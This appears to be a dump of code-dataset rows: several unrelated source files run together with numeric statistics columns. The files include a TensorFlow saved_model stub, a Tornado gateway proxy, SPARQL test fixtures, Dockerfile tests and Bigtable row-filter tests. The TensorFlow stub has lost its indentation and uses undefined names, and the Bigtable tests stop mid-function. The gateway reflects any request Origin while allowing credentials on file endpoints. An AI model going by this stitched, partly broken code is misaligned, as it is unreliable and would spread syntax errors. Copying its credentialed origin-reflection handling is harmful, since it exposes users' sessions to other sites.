from tensorflow._api.v1.saved_model import signature_def_utils
from tensorflow._api.v1.saved_model import tag_constants
from tensorflow._api.v1.saved_model import utils
from tensorflow.python.saved_model.builder_impl import SavedModelBuilder as Builder
from tensorflow.python.saved_model.constants import ASSETS_DIRECTORY
from tensorflow.python.saved_model.constants import ASSETS_KEY
from tensorflow.python.saved_model.constants import LEGACY_INIT_OP_KEY
from tensorflow.python.saved_model.constants import MAIN_OP_KEY
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PB
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PBTXT
from tensorflow.python.saved_model.constants import SAVED_MODEL_SCHEMA_VERSION
from tensorflow.python.saved_model.constants import VARIABLES_DIRECTORY
from tensorflow.python.saved_model.constants import VARIABLES_FILENAME
from tensorflow.python.saved_model.load import load as load_v2
from tensorflow.python.saved_model.loader_impl import load
from tensorflow.python.saved_model.loader_impl import maybe_saved_model_directory
from tensorflow.python.saved_model.loader_impl import maybe_saved_model_directory as contains_saved_model
from tensorflow.python.saved_model.main_op_impl import main_op_with_restore
from tensorflow.python.saved_model.save import save
from tensorflow.python.saved_model.signature_constants import CLASSIFY_INPUTS
from tensorflow.python.saved_model.signature_constants import CLASSIFY_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import CLASSIFY_OUTPUT_CLASSES
from tensorflow.python.saved_model.signature_constants import CLASSIFY_OUTPUT_SCORES
from tensorflow.python.saved_model.signature_constants import DEFAULT_SERVING_SIGNATURE_DEF_KEY
from tensorflow.python.saved_model.signature_constants import PREDICT_INPUTS
from tensorflow.python.saved_model.signature_constants import PREDICT_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import PREDICT_OUTPUTS
from tensorflow.python.saved_model.signature_constants import REGRESS_INPUTS
from tensorflow.python.saved_model.signature_constants import REGRESS_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import REGRESS_OUTPUTS
from tensorflow.python.saved_model.signature_def_utils_impl import build_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import classification_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import is_valid_signature
from tensorflow.python.saved_model.signature_def_utils_impl import predict_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import regression_signature_def
from tensorflow.python.saved_model.simple_save import simple_save
from tensorflow.python.saved_model.tag_constants import GPU
from tensorflow.python.saved_model.tag_constants import SERVING
from tensorflow.python.saved_model.tag_constants import TPU
from tensorflow.python.saved_model.tag_constants import TRAINING
from tensorflow.python.saved_model.utils_impl import build_tensor_info
from tensorflow.python.saved_model.utils_impl import get_tensor_from_tensor_info
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "saved_model", public_apis=None, deprecation=True,
has_lite=False)
| 60.686567
| 105
| 0.886621
| 580
| 4,066
| 5.862069
| 0.17069
| 0.164706
| 0.235294
| 0.286765
| 0.786471
| 0.751176
| 0.747941
| 0.68
| 0.432059
| 0.253235
| 0
| 0.002633
| 0.065912
| 4,066
| 66
| 106
| 61.606061
| 0.892575
| 0.041072
| 0
| 0
| 1
| 0
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.910714
| 0
| 0.910714
| 0.035714
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ed101c6fe9e198a1d6a5ad85af2d100fe5368f48
| 34
|
py
|
Python
|
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | 1
|
2020-01-06T19:45:55.000Z
|
2020-01-06T19:45:55.000Z
|
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | null | null | null |
from .password import PasswordType
| 34
| 34
| 0.882353
| 4
| 34
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ed24188abcd1fa1cc76a42b5d147be5e6a82782c
| 5,588
|
py
|
Python
|
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
gateway-python/app/web/rest/gateway_api.py
|
suomitek/cubeai
|
cc4c0f5f445a552d239910da63944307c1f06e37
|
[
"Apache-2.0"
] | null | null | null |
import json
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from app.service.gateway_service import gen_next_request, check_allow_forward
class GatewayApi(tornado.web.RequestHandler):
async def get(self, *args, **kwargs):
if not check_allow_forward(self.request):
self.send_error(403)
return
next_request, new_access_token, new_refresh_token = await gen_next_request(self.request)
if next_request is None:
self.set_status(500)
self.write('服务维护中...')
return
if new_access_token is not None and new_refresh_token is not None:
self.set_cookie('access_token', new_access_token)
self.set_cookie('session_token', new_refresh_token)
http = AsyncHTTPClient()
try:
res = await http.fetch(next_request)
except Exception as e:
res = e.response
self.set_status(res.code)
try:
json.loads(str(res.body, encoding='utf-8'))
count = res.headers.get('X-Total-Count')
if count is not None:
self.set_header('X-Total-Count', count)
except:
self._headers = res.headers
if self.request.path.startswith('/ability/web'):
self.set_header("Access-Control-Allow-Origin", "*") # 允许跨域访问
self.write(res.body)
async def post(self, *args, **kwargs):
if not check_allow_forward(self.request):
self.send_error(403)
return
next_request, new_access_token, new_refresh_token = await gen_next_request(self.request)
if next_request is None:
self.set_status(500)
self.write('服务维护中...')
return
if new_access_token is not None and new_refresh_token is not None:
self.set_cookie('access_token', new_access_token)
self.set_cookie('session_token', new_refresh_token)
http = AsyncHTTPClient()
try:
res = await http.fetch(next_request)
except Exception as e:
res = e.response
self.set_status(res.code)
try:
json.loads(str(res.body, encoding='utf-8'))
except:
self._headers = res.headers
if self.request.path.startswith('/ability/model') or self.request.path.startswith('/ability/sream'):
self.set_header("Access-Control-Allow-Origin", "*") # 允许跨域访问
elif self.request.path.startswith('/ability/file'):
self.set_header('Access-Control-Allow-Credentials', 'true')
self.set_header('Access-Control-Allow-Origin', self.request.headers.get('Origin'))
self.write(res.body)
async def put(self, *args, **kwargs):
if not check_allow_forward(self.request):
self.send_error(403)
return
next_request, new_access_token, new_refresh_token = await gen_next_request(self.request)
if next_request is None:
self.set_status(500)
self.write('服务维护中...')
return
if new_access_token is not None and new_refresh_token is not None:
self.set_cookie('access_token', new_access_token)
self.set_cookie('session_token', new_refresh_token)
http = AsyncHTTPClient()
try:
res = await http.fetch(next_request)
except Exception as e:
res = e.response
self.set_status(res.code)
try:
json.loads(str(res.body, encoding='utf-8'))
except:
self._headers = res.headers
self.write(res.body)
async def delete(self, *args, **kwargs):
if not check_allow_forward(self.request):
self.send_error(403)
return
next_request, new_access_token, new_refresh_token = await gen_next_request(self.request)
if next_request is None:
self.set_status(500)
self.write('服务维护中...')
return
if new_access_token is not None and new_refresh_token is not None:
self.set_cookie('access_token', new_access_token)
self.set_cookie('session_token', new_refresh_token)
http = AsyncHTTPClient()
try:
res = await http.fetch(next_request)
except Exception as e:
res = e.response
self.set_status(res.code)
try:
json.loads(str(res.body, encoding='utf-8'))
except:
self._headers = res.headers
self.write(res.body)
async def options(self, *args, **kwargs):
if self.request.path.startswith('/ability/model') \
or self.request.path.startswith('/ability/sream') \
or self.request.path.startswith('/ability/web'):
self.set_status(204)
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Headers", "content-type")
self.set_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.finish()
return
elif self.request.path.startswith('/ability/file'):
self.set_status(204)
self.set_header('Access-Control-Allow-Credentials', 'true')
self.set_header('Access-Control-Allow-Origin', self.request.headers.get('Origin'))
self.set_header("Access-Control-Allow-Headers", "content-type")
self.set_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.finish()
return
else:
self.send_error(403)
| 35.592357
| 108
| 0.607373
| 684
| 5,588
| 4.774854
| 0.131579
| 0.064299
| 0.051439
| 0.063993
| 0.909675
| 0.904776
| 0.890692
| 0.890692
| 0.852725
| 0.82823
| 0
| 0.009271
| 0.285791
| 5,588
| 156
| 109
| 35.820513
| 0.80907
| 0.002326
| 0
| 0.850394
| 0
| 0
| 0.12168
| 0.055815
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031496
| 0
| 0.11811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed5667cfd8b5adbd30a4d7d9eb786378cbc21dfb
| 4,939
|
py
|
Python
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 25
|
2018-09-07T14:43:51.000Z
|
2021-10-31T22:41:48.000Z
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 4
|
2018-10-28T15:32:08.000Z
|
2022-01-26T12:47:36.000Z
|
tests/database/fixtures.py
|
JulienDavat/sage-engine
|
87fb7075a07395a527da660d5efc056b0f49758c
|
[
"MIT"
] | 16
|
2018-12-04T17:50:12.000Z
|
2022-03-26T22:55:47.000Z
|
# fixtures.py
# Author: Thomas MINIER - MIT License 2017-2019
def index_scan_fixtures():
"""Get fixtures data for testing Index scans"""
return [
# spo
(
'http://db.uwaterloo.ca/~galuc/wsdbm/City102',
'http://www.geonames.org/ontology#parentCountry',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country17',
[
('http://db.uwaterloo.ca/~galuc/wsdbm/City102', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17')
]
),
# sp?
(
'http://db.uwaterloo.ca/~galuc/wsdbm/City102',
'http://www.geonames.org/ontology#parentCountry',
None,
[
('http://db.uwaterloo.ca/~galuc/wsdbm/City102', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17')
]
),
# s?o
(
'http://db.uwaterloo.ca/~galuc/wsdbm/City102',
None,
'http://db.uwaterloo.ca/~galuc/wsdbm/Country17',
[
('http://db.uwaterloo.ca/~galuc/wsdbm/City102', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17')
]
),
# ?po
(
None,
'http://www.geonames.org/ontology#parentCountry',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country17',
[
('http://db.uwaterloo.ca/~galuc/wsdbm/City102', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17'),
('http://db.uwaterloo.ca/~galuc/wsdbm/City120', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17'),
('http://db.uwaterloo.ca/~galuc/wsdbm/City123', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17'),
('http://db.uwaterloo.ca/~galuc/wsdbm/City206', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17'),
('http://db.uwaterloo.ca/~galuc/wsdbm/City209', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17'),
('http://db.uwaterloo.ca/~galuc/wsdbm/City217', 'http://www.geonames.org/ontology#parentCountry', 'http://db.uwaterloo.ca/~galuc/wsdbm/Country17')
]
),
# s??
(
'http://db.uwaterloo.ca/~galuc/wsdbm/Review19570',
None,
None,
[
('http://db.uwaterloo.ca/~galuc/wsdbm/Review19570', 'http://purl.org/stuff/rev#rating', '"8"'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Review19570', 'http://purl.org/stuff/rev#reviewer', 'http://db.uwaterloo.ca/~galuc/wsdbm/User84864'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Review19570', 'http://purl.org/stuff/rev#text', '"depressant Galveston\'s blindfold\'s Janna Occidentals untying motive\'s reestablished insurer\'s weekday\'s myth secularization site"'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Review19570', 'http://purl.org/stuff/rev#title', '"Annapurna\'s commence"')
]
),
# ??o
(
None,
None,
'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041',
[
('http://db.uwaterloo.ca/~galuc/wsdbm/Offer24200', 'http://purl.org/goodrelations/includes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Offer35124', 'http://purl.org/goodrelations/includes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Offer66663', 'http://purl.org/goodrelations/includes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Purchase13421', 'http://db.uwaterloo.ca/~galuc/wsdbm/purchaseFor', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/Purchase63338', 'http://db.uwaterloo.ca/~galuc/wsdbm/purchaseFor', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/User14463', 'http://db.uwaterloo.ca/~galuc/wsdbm/likes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/User27316', 'http://db.uwaterloo.ca/~galuc/wsdbm/likes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/User47637', 'http://db.uwaterloo.ca/~galuc/wsdbm/likes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041'),
('http://db.uwaterloo.ca/~galuc/wsdbm/User66340', 'http://db.uwaterloo.ca/~galuc/wsdbm/likes', 'http://db.uwaterloo.ca/~galuc/wsdbm/Product10041')
]
)
]
| 62.518987
| 241
| 0.594452
| 553
| 4,939
| 5.305606
| 0.146474
| 0.112474
| 0.281186
| 0.318678
| 0.8606
| 0.8606
| 0.851397
| 0.824131
| 0.818678
| 0.818678
| 0
| 0.049566
| 0.207532
| 4,939
| 78
| 242
| 63.320513
| 0.700051
| 0.025106
| 0
| 0.358209
| 0
| 0.014925
| 0.700541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| true
| 0
| 0
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ed64d5e02cca28e53ee8bf7a955f0a14335fced4
| 1,630
|
py
|
Python
|
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | 1
|
2019-10-18T02:25:32.000Z
|
2019-10-18T02:25:32.000Z
|
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/builders/test_dockerfile.py
|
QxiaoQ/fairing
|
3fb8dbc5970008a60eb4832550053aa1f2f215dd
|
[
"Apache-2.0"
] | 2
|
2020-05-11T07:48:28.000Z
|
2021-05-28T10:32:21.000Z
|
import tempfile
from kubeflow.fairing.builders import dockerfile
def test_writedockerfile_with_docker_cmd():
_, tmp_file = tempfile.mkstemp()
dockerfile.write_dockerfile(
destination=tmp_file,
docker_command=["python", "main.py"],
path_prefix="/pre",
base_image="foo_bar")
actual = open(tmp_file, 'r').read()
expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre
CMD python main.py"""
assert actual == expected
def test_writedockerfile_without_docker_cmd():
_, tmp_file = tempfile.mkstemp()
dockerfile.write_dockerfile(
destination=tmp_file,
docker_command=None,
path_prefix="/pre",
base_image="foo_bar")
actual = open(tmp_file, 'r').read()
expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre"""
assert actual == expected
def test_writedockerfile_with_early_install_reqs():
_, tmp_file = tempfile.mkstemp()
dockerfile.write_dockerfile(
destination=tmp_file,
docker_command=["python", "main.py"],
path_prefix="/pre",
base_image="foo_bar",
install_reqs_before_copy=True)
actual = open(tmp_file, 'r').read()
expected = """FROM foo_bar
WORKDIR /pre
ENV FAIRING_RUNTIME 1
COPY /pre/requirements.txt /pre
RUN if [ -e requirements.txt ];then pip install --no-cache -r requirements.txt; fi
COPY /pre /pre
CMD python main.py"""
assert actual == expected
| 29.107143
| 82
| 0.68773
| 217
| 1,630
| 4.940092
| 0.262673
| 0.058769
| 0.044776
| 0.061567
| 0.847015
| 0.847015
| 0.787313
| 0.787313
| 0.787313
| 0.787313
| 0
| 0.002287
| 0.195092
| 1,630
| 55
| 83
| 29.636364
| 0.814787
| 0
| 0
| 0.791667
| 0
| 0.0625
| 0.347853
| 0.012883
| 0
| 0
| 0
| 0
| 0.0625
| 1
| 0.0625
| false
| 0
| 0.041667
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c088dd102045f3614aff31c7fe00e3a37c655a2
| 121
|
py
|
Python
|
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | 1
|
2021-01-21T18:24:25.000Z
|
2021-01-21T18:24:25.000Z
|
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | null | null | null |
modules/tests/staff/__init__.py
|
smeissner/eden
|
9c4c78f0808e53c52d3caa4fa68162cddc174547
|
[
"MIT"
] | null | null | null |
from staff import *
from search_staff import *
from create_staff_job_role import *
from create_staff_certificate import *
| 30.25
| 38
| 0.842975
| 18
| 121
| 5.333333
| 0.444444
| 0.3125
| 0.3125
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123967
| 121
| 4
| 38
| 30.25
| 0.90566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9c0abe24f47d43b6a7bb6ec76ed5b805df274e1e
| 34,701
|
py
|
Python
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 4
|
2020-04-25T16:53:58.000Z
|
2020-04-30T20:43:06.000Z
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 3
|
2020-06-03T08:09:39.000Z
|
2021-04-30T21:17:43.000Z
|
Backend/python_server/venv/Lib/site-packages/gcloud/bigtable/test_row_filters.py
|
SulbhaAgg/EduSpace-1
|
f948d890aac7869016e75662c0c798f2a42d2ecc
|
[
"MIT"
] | 2
|
2021-08-21T04:45:15.000Z
|
2022-01-23T06:50:56.000Z
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_BoolFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import _BoolFilter
return _BoolFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
flag = object()
row_filter = self._makeOne(flag)
self.assertTrue(row_filter.flag is flag)
def test___eq__type_differ(self):
flag = object()
row_filter1 = self._makeOne(flag)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
flag = object()
row_filter1 = self._makeOne(flag)
row_filter2 = self._makeOne(flag)
self.assertEqual(row_filter1, row_filter2)
def test___ne__same_value(self):
flag = object()
row_filter1 = self._makeOne(flag)
row_filter2 = self._makeOne(flag)
comparison_val = (row_filter1 != row_filter2)
self.assertFalse(comparison_val)
class TestSinkFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import SinkFilter
return SinkFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
flag = True
row_filter = self._makeOne(flag)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(sink=flag)
self.assertEqual(pb_val, expected_pb)
class TestPassAllFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import PassAllFilter
return PassAllFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
flag = True
row_filter = self._makeOne(flag)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(pass_all_filter=flag)
self.assertEqual(pb_val, expected_pb)
class TestBlockAllFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import BlockAllFilter
return BlockAllFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
flag = True
row_filter = self._makeOne(flag)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(block_all_filter=flag)
self.assertEqual(pb_val, expected_pb)
class Test_RegexFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import _RegexFilter
return _RegexFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
regex = b'abc'
row_filter = self._makeOne(regex)
self.assertTrue(row_filter.regex is regex)
def test_constructor_non_bytes(self):
regex = u'abc'
row_filter = self._makeOne(regex)
self.assertEqual(row_filter.regex, b'abc')
def test___eq__type_differ(self):
regex = b'def-rgx'
row_filter1 = self._makeOne(regex)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
regex = b'trex-regex'
row_filter1 = self._makeOne(regex)
row_filter2 = self._makeOne(regex)
self.assertEqual(row_filter1, row_filter2)
def test___ne__same_value(self):
regex = b'abc'
row_filter1 = self._makeOne(regex)
row_filter2 = self._makeOne(regex)
comparison_val = (row_filter1 != row_filter2)
self.assertFalse(comparison_val)
class TestRowKeyRegexFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import RowKeyRegexFilter
return RowKeyRegexFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
regex = b'row-key-regex'
row_filter = self._makeOne(regex)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(row_key_regex_filter=regex)
self.assertEqual(pb_val, expected_pb)
class TestRowSampleFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import RowSampleFilter
return RowSampleFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
sample = object()
row_filter = self._makeOne(sample)
self.assertTrue(row_filter.sample is sample)
def test___eq__type_differ(self):
sample = object()
row_filter1 = self._makeOne(sample)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
sample = object()
row_filter1 = self._makeOne(sample)
row_filter2 = self._makeOne(sample)
self.assertEqual(row_filter1, row_filter2)
def test_to_pb(self):
sample = 0.25
row_filter = self._makeOne(sample)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(row_sample_filter=sample)
self.assertEqual(pb_val, expected_pb)
class TestFamilyNameRegexFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import FamilyNameRegexFilter
return FamilyNameRegexFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
regex = u'family-regex'
row_filter = self._makeOne(regex)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(family_name_regex_filter=regex)
self.assertEqual(pb_val, expected_pb)
class TestColumnQualifierRegexFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import ColumnQualifierRegexFilter
return ColumnQualifierRegexFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_to_pb(self):
regex = b'column-regex'
row_filter = self._makeOne(regex)
pb_val = row_filter.to_pb()
expected_pb = _RowFilterPB(
column_qualifier_regex_filter=regex)
self.assertEqual(pb_val, expected_pb)
class TestTimestampRange(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import TimestampRange
return TimestampRange
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
start = object()
end = object()
time_range = self._makeOne(start=start, end=end)
self.assertTrue(time_range.start is start)
self.assertTrue(time_range.end is end)
def test___eq__(self):
start = object()
end = object()
time_range1 = self._makeOne(start=start, end=end)
time_range2 = self._makeOne(start=start, end=end)
self.assertEqual(time_range1, time_range2)
def test___eq__type_differ(self):
start = object()
end = object()
time_range1 = self._makeOne(start=start, end=end)
time_range2 = object()
self.assertNotEqual(time_range1, time_range2)
def test___ne__same_value(self):
start = object()
end = object()
time_range1 = self._makeOne(start=start, end=end)
time_range2 = self._makeOne(start=start, end=end)
comparison_val = (time_range1 != time_range2)
self.assertFalse(comparison_val)
def _to_pb_helper(self, start_micros=None, end_micros=None):
import datetime
from gcloud._helpers import _EPOCH
pb_kwargs = {}
start = None
if start_micros is not None:
start = _EPOCH + datetime.timedelta(microseconds=start_micros)
pb_kwargs['start_timestamp_micros'] = start_micros
end = None
if end_micros is not None:
end = _EPOCH + datetime.timedelta(microseconds=end_micros)
pb_kwargs['end_timestamp_micros'] = end_micros
time_range = self._makeOne(start=start, end=end)
expected_pb = _TimestampRangePB(**pb_kwargs)
self.assertEqual(time_range.to_pb(), expected_pb)
def test_to_pb(self):
# Makes sure already milliseconds granularity
start_micros = 30871000
end_micros = 12939371000
self._to_pb_helper(start_micros=start_micros,
end_micros=end_micros)
def test_to_pb_start_only(self):
# Makes sure already milliseconds granularity
start_micros = 30871000
self._to_pb_helper(start_micros=start_micros)
def test_to_pb_end_only(self):
# Makes sure already milliseconds granularity
end_micros = 12939371000
self._to_pb_helper(end_micros=end_micros)
class TestTimestampRangeFilter(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.row_filters import TimestampRangeFilter
return TimestampRangeFilter
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
range_ = object()
row_filter = self._makeOne(range_)
self.assertTrue(row_filter.range_ is range_)
def test___eq__type_differ(self):
range_ = object()
row_filter1 = self._makeOne(range_)
row_filter2 = object()
self.assertNotEqual(row_filter1, row_filter2)
def test___eq__same_value(self):
range_ = object()
row_filter1 = self._makeOne(range_)
row_filter2 = self._makeOne(range_)
